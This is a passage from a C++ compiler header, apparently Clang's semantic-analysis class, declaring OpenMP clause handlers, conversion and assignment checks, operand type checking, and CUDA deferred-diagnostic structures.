/// Called on well-formed 'linear' clause.
OMPClause *
ActOnOpenMPLinearClause(ArrayRef<Expr *> VarList, Expr *Step,
SourceLocation StartLoc, SourceLocation LParenLoc,
OpenMPLinearClauseKind LinKind, SourceLocation LinLoc,
SourceLocation ColonLoc, SourceLocation EndLoc);
/// Called on well-formed 'aligned' clause.
OMPClause *ActOnOpenMPAlignedClause(ArrayRef<Expr *> VarList,
Expr *Alignment,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyin' clause.
OMPClause *ActOnOpenMPCopyinClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyprivate' clause.
OMPClause *ActOnOpenMPCopyprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'flush' pseudo clause.
OMPClause *ActOnOpenMPFlushClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depend' clause.
OMPClause *
ActOnOpenMPDependClause(OpenMPDependClauseKind DepKind, SourceLocation DepLoc,
SourceLocation ColonLoc, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'device' clause.
OMPClause *ActOnOpenMPDeviceClause(Expr *Device, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'map' clause.
OMPClause *
ActOnOpenMPMapClause(ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc,
CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
OpenMPMapClauseKind MapType, bool IsMapTypeImplicit,
SourceLocation MapLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'num_teams' clause.
OMPClause *ActOnOpenMPNumTeamsClause(Expr *NumTeams, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'thread_limit' clause.
OMPClause *ActOnOpenMPThreadLimitClause(Expr *ThreadLimit,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'priority' clause.
OMPClause *ActOnOpenMPPriorityClause(Expr *Priority, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dist_schedule' clause.
OMPClause *ActOnOpenMPDistScheduleClause(
OpenMPDistScheduleClauseKind Kind, Expr *ChunkSize,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation KindLoc,
SourceLocation CommaLoc, SourceLocation EndLoc);
/// Called on well-formed 'defaultmap' clause.
OMPClause *ActOnOpenMPDefaultmapClause(
OpenMPDefaultmapClauseModifier M, OpenMPDefaultmapClauseKind Kind,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation MLoc,
SourceLocation KindLoc, SourceLocation EndLoc);
/// Called on well-formed 'to' clause.
OMPClause *
ActOnOpenMPToClause(ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'from' clause.
OMPClause *ActOnOpenMPFromClause(
ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'use_device_ptr' clause.
OMPClause *ActOnOpenMPUseDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'is_device_ptr' clause.
OMPClause *ActOnOpenMPIsDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'nontemporal' clause.
OMPClause *ActOnOpenMPNontemporalClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// The kind of conversion being performed.
enum CheckedConversionKind {
/// An implicit conversion.
CCK_ImplicitConversion,
/// A C-style cast.
CCK_CStyleCast,
/// A functional-style cast.
CCK_FunctionalCast,
/// A cast other than a C-style cast.
CCK_OtherCast,
/// A conversion for an operand of a builtin overloaded operator.
CCK_ForBuiltinOverloadedOp
};
static bool isCast(CheckedConversionKind CCK) {
return CCK == CCK_CStyleCast || CCK == CCK_FunctionalCast ||
CCK == CCK_OtherCast;
}
/// ImpCastExprToType - If Expr is not of type 'Type', insert an implicit
/// cast. If there is already an implicit cast, merge into the existing one.
/// If isLvalue, the result of the cast is an lvalue.
ExprResult ImpCastExprToType(Expr *E, QualType Type, CastKind CK,
ExprValueKind VK = VK_RValue,
const CXXCastPath *BasePath = nullptr,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
/// ScalarTypeToBooleanCastKind - Returns the cast kind corresponding
/// to the conversion from scalar type ScalarTy to the Boolean type.
static CastKind ScalarTypeToBooleanCastKind(QualType ScalarTy);
/// IgnoredValueConversions - Given that an expression's result is
/// syntactically ignored, perform any conversions that are
/// required.
ExprResult IgnoredValueConversions(Expr *E);
// UsualUnaryConversions - promotes integers (C99 6.3.1.1p2) and converts
// functions and arrays to their respective pointers (C99 6.3.2.1).
ExprResult UsualUnaryConversions(Expr *E);
/// CallExprUnaryConversions - a special case of an unary conversion
/// performed on a function designator of a call expression.
ExprResult CallExprUnaryConversions(Expr *E);
// DefaultFunctionArrayConversion - converts functions and arrays
// to their respective pointers (C99 6.3.2.1).
ExprResult DefaultFunctionArrayConversion(Expr *E, bool Diagnose = true);
// DefaultFunctionArrayLvalueConversion - converts functions and
// arrays to their respective pointers and performs the
// lvalue-to-rvalue conversion.
ExprResult DefaultFunctionArrayLvalueConversion(Expr *E,
bool Diagnose = true);
// DefaultLvalueConversion - performs lvalue-to-rvalue conversion on
// the operand. This is DefaultFunctionArrayLvalueConversion,
// except that it assumes the operand isn't of function or array
// type.
ExprResult DefaultLvalueConversion(Expr *E);
// DefaultArgumentPromotion (C99 6.5.2.2p6). Used for function calls that
// do not have a prototype. Integer promotions are performed on each
// argument, and arguments that have type float are promoted to double.
ExprResult DefaultArgumentPromotion(Expr *E);
/// If \p E is a prvalue denoting an unmaterialized temporary, materialize
/// it as an xvalue. In C++98, the result will still be a prvalue, because
/// we don't have xvalues there.
ExprResult TemporaryMaterializationConversion(Expr *E);
// Used for emitting the right warning by DefaultVariadicArgumentPromotion
enum VariadicCallType {
VariadicFunction,
VariadicBlock,
VariadicMethod,
VariadicConstructor,
VariadicDoesNotApply
};
VariadicCallType getVariadicCallType(FunctionDecl *FDecl,
const FunctionProtoType *Proto,
Expr *Fn);
// Used for determining in which context a type is allowed to be passed to a
// vararg function.
enum VarArgKind {
VAK_Valid,
VAK_ValidInCXX11,
VAK_Undefined,
VAK_MSVCUndefined,
VAK_Invalid
};
// Determines which VarArgKind fits an expression.
VarArgKind isValidVarArgType(const QualType &Ty);
/// Check to see if the given expression is a valid argument to a variadic
/// function, issuing a diagnostic if not.
void checkVariadicArgument(const Expr *E, VariadicCallType CT);
/// Check to see if a given expression could have '.c_str()' called on it.
bool hasCStrMethod(const Expr *E);
/// GatherArgumentsForCall - Collector argument expressions for various
/// form of call prototypes.
bool GatherArgumentsForCall(SourceLocation CallLoc, FunctionDecl *FDecl,
const FunctionProtoType *Proto,
unsigned FirstParam, ArrayRef<Expr *> Args,
SmallVectorImpl<Expr *> &AllArgs,
VariadicCallType CallType = VariadicDoesNotApply,
bool AllowExplicit = false,
bool IsListInitialization = false);
// DefaultVariadicArgumentPromotion - Like DefaultArgumentPromotion, but
// will create a runtime trap if the resulting type is not a POD type.
ExprResult DefaultVariadicArgumentPromotion(Expr *E, VariadicCallType CT,
FunctionDecl *FDecl);
/// Context in which we're performing a usual arithmetic conversion.
enum ArithConvKind {
/// An arithmetic operation.
ACK_Arithmetic,
/// A bitwise operation.
ACK_BitwiseOp,
/// A comparison.
ACK_Comparison,
/// A conditional (?:) operator.
ACK_Conditional,
/// A compound assignment expression.
ACK_CompAssign,
};
// UsualArithmeticConversions - performs the UsualUnaryConversions on it's
// operands and then handles various conversions that are common to binary
// operators (C99 6.3.1.8). If both operands aren't arithmetic, this
// routine returns the first non-arithmetic type found. The client is
// responsible for emitting appropriate error diagnostics.
QualType UsualArithmeticConversions(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, ArithConvKind ACK);
/// AssignConvertType - All of the 'assignment' semantic checks return this
/// enum to indicate whether the assignment was allowed. These checks are
/// done for simple assignments, as well as initialization, return from
/// function, argument passing, etc. The query is phrased in terms of a
/// source and destination type.
enum AssignConvertType {
/// Compatible - the types are compatible according to the standard.
Compatible,
/// PointerToInt - The assignment converts a pointer to an int, which we
/// accept as an extension.
PointerToInt,
/// IntToPointer - The assignment converts an int to a pointer, which we
/// accept as an extension.
IntToPointer,
/// FunctionVoidPointer - The assignment is between a function pointer and
/// void*, which the standard doesn't allow, but we accept as an extension.
FunctionVoidPointer,
/// IncompatiblePointer - The assignment is between two pointers types that
/// are not compatible, but we accept them as an extension.
IncompatiblePointer,
/// IncompatiblePointerSign - The assignment is between two pointers types
/// which point to integers which have a different sign, but are otherwise
/// identical. This is a subset of the above, but broken out because it's by
/// far the most common case of incompatible pointers.
IncompatiblePointerSign,
/// CompatiblePointerDiscardsQualifiers - The assignment discards
/// c/v/r qualifiers, which we accept as an extension.
CompatiblePointerDiscardsQualifiers,
/// IncompatiblePointerDiscardsQualifiers - The assignment
/// discards qualifiers that we don't permit to be discarded,
/// like address spaces.
IncompatiblePointerDiscardsQualifiers,
/// IncompatibleNestedPointerAddressSpaceMismatch - The assignment
/// changes address spaces in nested pointer types which is not allowed.
/// For instance, converting __private int ** to __generic int ** is
/// illegal even though __private could be converted to __generic.
IncompatibleNestedPointerAddressSpaceMismatch,
/// IncompatibleNestedPointerQualifiers - The assignment is between two
/// nested pointer types, and the qualifiers other than the first two
/// levels differ e.g. char ** -> const char **, but we accept them as an
/// extension.
IncompatibleNestedPointerQualifiers,
/// IncompatibleVectors - The assignment is between two vector types that
/// have the same size, which we accept as an extension.
IncompatibleVectors,
/// IntToBlockPointer - The assignment converts an int to a block
/// pointer. We disallow this.
IntToBlockPointer,
/// IncompatibleBlockPointer - The assignment is between two block
/// pointers types that are not compatible.
IncompatibleBlockPointer,
/// IncompatibleObjCQualifiedId - The assignment is between a qualified
/// id type and something else (that is incompatible with it). For example,
/// "id <XXX>" = "Foo *", where "Foo *" doesn't implement the XXX protocol.
IncompatibleObjCQualifiedId,
/// IncompatibleObjCWeakRef - Assigning a weak-unavailable object to an
/// object with __weak qualifier.
IncompatibleObjCWeakRef,
/// Incompatible - We reject this conversion outright, it is invalid to
/// represent it in the AST.
Incompatible
};
/// DiagnoseAssignmentResult - Emit a diagnostic, if required, for the
/// assignment conversion type specified by ConvTy. This returns true if the
/// conversion was invalid or false if the conversion was accepted.
bool DiagnoseAssignmentResult(AssignConvertType ConvTy,
SourceLocation Loc,
QualType DstType, QualType SrcType,
Expr *SrcExpr, AssignmentAction Action,
bool *Complained = nullptr);
/// IsValueInFlagEnum - Determine if a value is allowed as part of a flag
/// enum. If AllowMask is true, then we also allow the complement of a valid
/// value, to be used as a mask.
bool IsValueInFlagEnum(const EnumDecl *ED, const llvm::APInt &Val,
bool AllowMask) const;
/// DiagnoseAssignmentEnum - Warn if assignment to enum is a constant
/// integer not in the range of enum values.
void DiagnoseAssignmentEnum(QualType DstType, QualType SrcType,
Expr *SrcExpr);
/// CheckAssignmentConstraints - Perform type checking for assignment,
/// argument passing, variable initialization, and function return values.
/// C99 6.5.16.
AssignConvertType CheckAssignmentConstraints(SourceLocation Loc,
QualType LHSType,
QualType RHSType);
/// Check assignment constraints and optionally prepare for a conversion of
/// the RHS to the LHS type. The conversion is prepared for if ConvertRHS
/// is true.
AssignConvertType CheckAssignmentConstraints(QualType LHSType,
ExprResult &RHS,
CastKind &Kind,
bool ConvertRHS = true);
/// Check assignment constraints for an assignment of RHS to LHSType.
///
/// \param LHSType The destination type for the assignment.
/// \param RHS The source expression for the assignment.
/// \param Diagnose If \c true, diagnostics may be produced when checking
/// for assignability. If a diagnostic is produced, \p RHS will be
/// set to ExprError(). Note that this function may still return
/// without producing a diagnostic, even for an invalid assignment.
/// \param DiagnoseCFAudited If \c true, the target is a function parameter
/// in an audited Core Foundation API and does not need to be checked
/// for ARC retain issues.
/// \param ConvertRHS If \c true, \p RHS will be updated to model the
/// conversions necessary to perform the assignment. If \c false,
/// \p Diagnose must also be \c false.
AssignConvertType CheckSingleAssignmentConstraints(
QualType LHSType, ExprResult &RHS, bool Diagnose = true,
bool DiagnoseCFAudited = false, bool ConvertRHS = true);
// If the lhs type is a transparent union, check whether we
// can initialize the transparent union with the given expression.
AssignConvertType CheckTransparentUnionArgumentConstraints(QualType ArgType,
ExprResult &RHS);
bool IsStringLiteralToNonConstPointerConversion(Expr *From, QualType ToType);
bool CheckExceptionSpecCompatibility(Expr *From, QualType ToType);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit = false);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit,
ImplicitConversionSequence& ICS);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const ImplicitConversionSequence& ICS,
AssignmentAction Action,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const StandardConversionSequence& SCS,
AssignmentAction Action,
CheckedConversionKind CCK);
ExprResult PerformQualificationConversion(
Expr *E, QualType Ty, ExprValueKind VK = VK_RValue,
CheckedConversionKind CCK = CCK_ImplicitConversion);
/// the following "Check" methods will return a valid/converted QualType
/// or a null QualType (indicating an error diagnostic was issued).
/// type checking binary operators (subroutines of CreateBuiltinBinOp).
QualType InvalidOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType InvalidLogicalVectorOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType CheckPointerToMemberOperands( // C++ 5.5
ExprResult &LHS, ExprResult &RHS, ExprValueKind &VK,
SourceLocation OpLoc, bool isIndirect);
QualType CheckMultiplyDivideOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc, bool IsCompAssign,
bool IsDivide);
QualType CheckRemainderOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
bool IsCompAssign = false);
QualType CheckAdditionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, QualType* CompLHSTy = nullptr);
QualType CheckSubtractionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
QualType* CompLHSTy = nullptr);
QualType CheckShiftOperands( // C99 6.5.7
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, bool IsCompAssign = false);
void CheckPtrComparisonWithNullChar(ExprResult &E, ExprResult &NullE);
QualType CheckCompareOperands( // C99 6.5.8/9
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckBitwiseOperands( // C99 6.5.[10...12]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckLogicalOperands( // C99 6.5.[13,14]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
// CheckAssignmentOperands is used for both simple and compound assignment.
// For simple assignment, pass both expressions and a null converted type.
// For compound assignment, pass both expressions and the converted type.
QualType CheckAssignmentOperands( // C99 6.5.16.[1,2]
Expr *LHSExpr, ExprResult &RHS, SourceLocation Loc, QualType CompoundType);
ExprResult checkPseudoObjectIncDec(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opcode, Expr *Op);
ExprResult checkPseudoObjectAssignment(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opcode,
Expr *LHS, Expr *RHS);
ExprResult checkPseudoObjectRValue(Expr *E);
Expr *recreateSyntacticForm(PseudoObjectExpr *E);
QualType CheckConditionalOperands( // C99 6.5.15
ExprResult &Cond, ExprResult &LHS, ExprResult &RHS,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation QuestionLoc);
QualType CXXCheckConditionalOperands( // C++ 5.16
ExprResult &cond, ExprResult &lhs, ExprResult &rhs,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation questionLoc);
QualType FindCompositePointerType(SourceLocation Loc, Expr *&E1, Expr *&E2,
bool ConvertArgs = true);
QualType FindCompositePointerType(SourceLocation Loc,
ExprResult &E1, ExprResult &E2,
bool ConvertArgs = true) {
Expr *E1Tmp = E1.get(), *E2Tmp = E2.get();
QualType Composite =
FindCompositePointerType(Loc, E1Tmp, E2Tmp, ConvertArgs);
E1 = E1Tmp;
E2 = E2Tmp;
return Composite;
}
QualType FindCompositeObjCPointerType(ExprResult &LHS, ExprResult &RHS,
SourceLocation QuestionLoc);
bool DiagnoseConditionalForNull(Expr *LHSExpr, Expr *RHSExpr,
SourceLocation QuestionLoc);
void DiagnoseAlwaysNonNullPointer(Expr *E,
Expr::NullPointerConstantKind NullType,
bool IsEqual, SourceRange Range);
/// type checking for vector binary operators.
QualType CheckVectorOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, bool IsCompAssign,
bool AllowBothBool, bool AllowBoolConversion);
QualType GetSignedVectorType(QualType V);
QualType CheckVectorCompareOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckVectorLogicalOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc);
bool areLaxCompatibleVectorTypes(QualType srcType, QualType destType);
bool isLaxVectorConversion(QualType srcType, QualType destType);
/// type checking declaration initializers (C99 6.7.8)
bool CheckForConstantInitializer(Expr *e, QualType t);
// type checking C++ declaration initializers (C++ [dcl.init]).
/// ReferenceCompareResult - Expresses the result of comparing two
/// types (cv1 T1 and cv2 T2) to determine their compatibility for the
/// purposes of initialization by reference (C++ [dcl.init.ref]p4).
enum ReferenceCompareResult {
/// Ref_Incompatible - The two types are incompatible, so direct
/// reference binding is not possible.
Ref_Incompatible = 0,
/// Ref_Related - The two types are reference-related, which means
/// that their unqualified forms (T1 and T2) are either the same
/// or T1 is a base class of T2.
Ref_Related,
/// Ref_Compatible - The two types are reference-compatible.
Ref_Compatible
};
// Fake up a scoped enumeration that still contextually converts to bool.
struct ReferenceConversionsScope {
/// The conversions that would be performed on an lvalue of type T2 when
/// binding a reference of type T1 to it, as determined when evaluating
/// whether T1 is reference-compatible with T2.
enum ReferenceConversions {
Qualification = 0x1,
Function = 0x2,
DerivedToBase = 0x4,
ObjC = 0x8,
ObjCLifetime = 0x10,
LLVM_MARK_AS_BITMASK_ENUM(/*LargestValue=*/ObjCLifetime)
};
};
using ReferenceConversions = ReferenceConversionsScope::ReferenceConversions;
ReferenceCompareResult
CompareReferenceRelationship(SourceLocation Loc, QualType T1, QualType T2,
ReferenceConversions *Conv = nullptr);
ExprResult checkUnknownAnyCast(SourceRange TypeRange, QualType CastType,
Expr *CastExpr, CastKind &CastKind,
ExprValueKind &VK, CXXCastPath &Path);
/// Force an expression with unknown-type to an expression of the
/// given type.
ExprResult forceUnknownAnyToType(Expr *E, QualType ToType);
/// Type-check an expression that's being passed to an
/// __unknown_anytype parameter.
ExprResult checkUnknownAnyArg(SourceLocation callLoc,
Expr *result, QualType ¶mType);
// CheckVectorCast - check type constraints for vectors.
// Since vectors are an extension, there are no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size.
// returns true if the cast is invalid
bool CheckVectorCast(SourceRange R, QualType VectorTy, QualType Ty,
CastKind &Kind);
/// Prepare `SplattedExpr` for a vector splat operation, adding
/// implicit casts if necessary.
ExprResult prepareVectorSplat(QualType VectorTy, Expr *SplattedExpr);
// CheckExtVectorCast - check type constraints for extended vectors.
// Since vectors are an extension, there are no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size,
// or vectors and the element type of that vector.
// returns the cast expr
ExprResult CheckExtVectorCast(SourceRange R, QualType DestTy, Expr *CastExpr,
CastKind &Kind);
ExprResult BuildCXXFunctionalCastExpr(TypeSourceInfo *TInfo, QualType Type,
SourceLocation LParenLoc,
Expr *CastExpr,
SourceLocation RParenLoc);
enum ARCConversionResult { ACR_okay, ACR_unbridged, ACR_error };
/// Checks for invalid conversions and casts between
/// retainable pointers and other pointer kinds for ARC and Weak.
ARCConversionResult CheckObjCConversion(SourceRange castRange,
QualType castType, Expr *&op,
CheckedConversionKind CCK,
bool Diagnose = true,
bool DiagnoseCFAudited = false,
BinaryOperatorKind Opc = BO_PtrMemD
);
Expr *stripARCUnbridgedCast(Expr *e);
void diagnoseARCUnbridgedCast(Expr *e);
bool CheckObjCARCUnavailableWeakConversion(QualType castType,
QualType ExprType);
/// checkRetainCycles - Check whether an Objective-C message send
/// might create an obvious retain cycle.
void checkRetainCycles(ObjCMessageExpr *msg);
void checkRetainCycles(Expr *receiver, Expr *argument);
void checkRetainCycles(VarDecl *Var, Expr *Init);
/// checkUnsafeAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained type.
bool checkUnsafeAssigns(SourceLocation Loc, QualType LHS, Expr *RHS);
/// checkUnsafeExprAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained expression.
void checkUnsafeExprAssigns(SourceLocation Loc, Expr *LHS, Expr *RHS);
/// CheckMessageArgumentTypes - Check types in an Obj-C message send.
/// \param Method - May be null.
/// \param [out] ReturnType - The return type of the send.
/// \return true iff there were any incompatible types.
bool CheckMessageArgumentTypes(const Expr *Receiver, QualType ReceiverType,
MultiExprArg Args, Selector Sel,
ArrayRef<SourceLocation> SelectorLocs,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage, SourceLocation lbrac,
SourceLocation rbrac, SourceRange RecRange,
QualType &ReturnType, ExprValueKind &VK);
/// Determine the result of a message send expression based on
/// the type of the receiver, the method expected to receive the message,
/// and the form of the message send.
QualType getMessageSendResultType(const Expr *Receiver, QualType ReceiverType,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage);
/// If the given expression involves a message send to a method
/// with a related result type, emit a note describing what happened.
void EmitRelatedResultTypeNote(const Expr *E);
/// Given that we had incompatible pointer types in a return
/// statement, check whether we're in a method with a related result
/// type, and if so, emit a note describing what happened.
void EmitRelatedResultTypeNoteForReturn(QualType destType);
class ConditionResult {
Decl *ConditionVar;
FullExprArg Condition;
bool Invalid;
bool HasKnownValue;
bool KnownValue;
friend class Sema;
ConditionResult(Sema &S, Decl *ConditionVar, FullExprArg Condition,
bool IsConstexpr)
: ConditionVar(ConditionVar), Condition(Condition), Invalid(false),
HasKnownValue(IsConstexpr && Condition.get() &&
!Condition.get()->isValueDependent()),
KnownValue(HasKnownValue &&
!!Condition.get()->EvaluateKnownConstInt(S.Context)) {}
explicit ConditionResult(bool Invalid)
: ConditionVar(nullptr), Condition(nullptr), Invalid(Invalid),
HasKnownValue(false), KnownValue(false) {}
public:
ConditionResult() : ConditionResult(false) {}
bool isInvalid() const { return Invalid; }
std::pair<VarDecl *, Expr *> get() const {
return std::make_pair(cast_or_null<VarDecl>(ConditionVar),
Condition.get());
}
llvm::Optional<bool> getKnownValue() const {
if (!HasKnownValue)
return None;
return KnownValue;
}
};
static ConditionResult ConditionError() { return ConditionResult(true); }
enum class ConditionKind {
Boolean, ///< A boolean condition, from 'if', 'while', 'for', or 'do'.
ConstexprIf, ///< A constant boolean condition from 'if constexpr'.
Switch ///< An integral condition for a 'switch' statement.
};
ConditionResult ActOnCondition(Scope *S, SourceLocation Loc,
Expr *SubExpr, ConditionKind CK);
ConditionResult ActOnConditionVariable(Decl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
DeclResult ActOnCXXConditionDeclaration(Scope *S, Declarator &D);
ExprResult CheckConditionVariable(VarDecl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
ExprResult CheckSwitchCondition(SourceLocation SwitchLoc, Expr *Cond);
/// CheckBooleanCondition - Diagnose problems involving the use of
/// the given expression as a boolean condition (e.g. in an if
/// statement). Also performs the standard function and array
/// decays, possibly changing the input variable.
///
/// \param Loc - A location associated with the condition, e.g. the
/// 'if' keyword.
/// \return true iff there were any errors
ExprResult CheckBooleanCondition(SourceLocation Loc, Expr *E,
bool IsConstexpr = false);
/// ActOnExplicitBoolSpecifier - Build an ExplicitSpecifier from an expression
/// found in an explicit(bool) specifier.
ExplicitSpecifier ActOnExplicitBoolSpecifier(Expr *E);
/// tryResolveExplicitSpecifier - Attempt to resolve the explict specifier.
/// Returns true if the explicit specifier is now resolved.
bool tryResolveExplicitSpecifier(ExplicitSpecifier &ExplicitSpec);
/// DiagnoseAssignmentAsCondition - Given that an expression is
/// being used as a boolean condition, warn if it's an assignment.
void DiagnoseAssignmentAsCondition(Expr *E);
/// Redundant parentheses over an equality comparison can indicate
/// that the user intended an assignment used as condition.
void DiagnoseEqualityWithExtraParens(ParenExpr *ParenE);
/// CheckCXXBooleanCondition - Returns true if conversion to bool is invalid.
ExprResult CheckCXXBooleanCondition(Expr *CondExpr, bool IsConstexpr = false);
/// ConvertIntegerToTypeWarnOnOverflow - Convert the specified APInt to have
/// the specified width and sign. If an overflow occurs, detect it and emit
/// the specified diagnostic.
void ConvertIntegerToTypeWarnOnOverflow(llvm::APSInt &OldVal,
unsigned NewWidth, bool NewSign,
SourceLocation Loc, unsigned DiagID);
/// Checks that the Objective-C declaration is declared in the global scope.
/// Emits an error and marks the declaration as invalid if it's not declared
/// in the global scope.
bool CheckObjCDeclScope(Decl *D);
/// Abstract base class used for diagnosing integer constant
/// expression violations.
class VerifyICEDiagnoser {
public:
bool Suppress;
VerifyICEDiagnoser(bool Suppress = false) : Suppress(Suppress) { }
virtual void diagnoseNotICE(Sema &S, SourceLocation Loc, SourceRange SR) =0;
virtual void diagnoseFold(Sema &S, SourceLocation Loc, SourceRange SR);
virtual ~VerifyICEDiagnoser() { }
};
/// VerifyIntegerConstantExpression - Verifies that an expression is an ICE,
/// and reports the appropriate diagnostics. Returns false on success.
/// Can optionally return the value of the expression.
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
VerifyICEDiagnoser &Diagnoser,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
unsigned DiagID,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E,
llvm::APSInt *Result = nullptr);
/// VerifyBitField - verifies that a bit field expression is an ICE and has
/// the correct width, and that the field type is valid.
/// Returns false on success.
/// Can optionally return whether the bit-field is of width 0
ExprResult VerifyBitField(SourceLocation FieldLoc, IdentifierInfo *FieldName,
QualType FieldTy, bool IsMsStruct,
Expr *BitWidth, bool *ZeroWidth = nullptr);
private:
unsigned ForceCUDAHostDeviceDepth = 0;
public:
/// Increments our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. So long as this count is greater
/// than zero, all functions encountered will be __host__ __device__.
void PushForceCUDAHostDevice();
/// Decrements our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. Returns false if the count is 0
/// before incrementing, so you can emit an error.
bool PopForceCUDAHostDevice();
/// Diagnostics that are emitted only if we discover that the given function
/// must be codegen'ed. Because handling these correctly adds overhead to
/// compilation, this is currently only enabled for CUDA compilations.
llvm::DenseMap<CanonicalDeclPtr<FunctionDecl>,
std::vector<PartialDiagnosticAt>>
DeviceDeferredDiags;
/// A pair of a canonical FunctionDecl and a SourceLocation. When used as the
/// key in a hashtable, both the FD and location are hashed.
struct FunctionDeclAndLoc {
CanonicalDeclPtr<FunctionDecl> FD;
SourceLocation Loc;
};
/// FunctionDecls and SourceLocations for which CheckCUDACall has emitted a
/// (maybe deferred) "bad call" diagnostic. We use this to avoid emitting the
/// same deferred diag twice.
llvm::DenseSet<FunctionDeclAndLoc> LocsWithCUDACallDiags;
/// An inverse call graph, mapping known-emitted functions to one of their
/// known-emitted callers (plus the location of the call).
///
/// Functions that we can tell a priori must be emitted aren't added to this
/// map.
llvm::DenseMap</* Callee = */ CanonicalDeclPtr<FunctionDecl>,
/* Caller = */ FunctionDeclAndLoc>
DeviceKnownEmittedFns;
/// A partial call graph maintained during CUDA/OpenMP device code compilation
/// to support deferred diagnostics.
///
/// Functions are only added here if, at the time they're considered, they are
/// not known-emitted. As soon as we discover that a function is
/// known-emitted, we remove it and everything it transitively calls from this
/// set and add those functions to DeviceKnownEmittedFns.
llvm::DenseMap</* Caller = */ CanonicalDeclPtr<FunctionDecl>,
/* Callees = */ llvm::MapVector<CanonicalDeclPtr<FunctionDecl>,
SourceLocation>>
DeviceCallGraph;
/// Diagnostic builder for CUDA/OpenMP devices errors which may or may not be
/// deferred.
///
/// In CUDA, there exist constructs (e.g. variable-length arrays, try/catch)
/// which are not allowed to appear inside __device__ functions and are
/// allowed to appear in __host__ __device__ functions only if the host+device
/// function is never codegen'ed.
///
/// To handle this, we use the notion of "deferred diagnostics", where we
/// attach a diagnostic to a FunctionDecl that's emitted iff it's codegen'ed.
///
/// This class lets you emit either a regular diagnostic, a deferred
/// diagnostic, or no diagnostic at all, according to an argument you pass to
/// its constructor, thus simplifying the process of creating these "maybe
/// deferred" diagnostics.
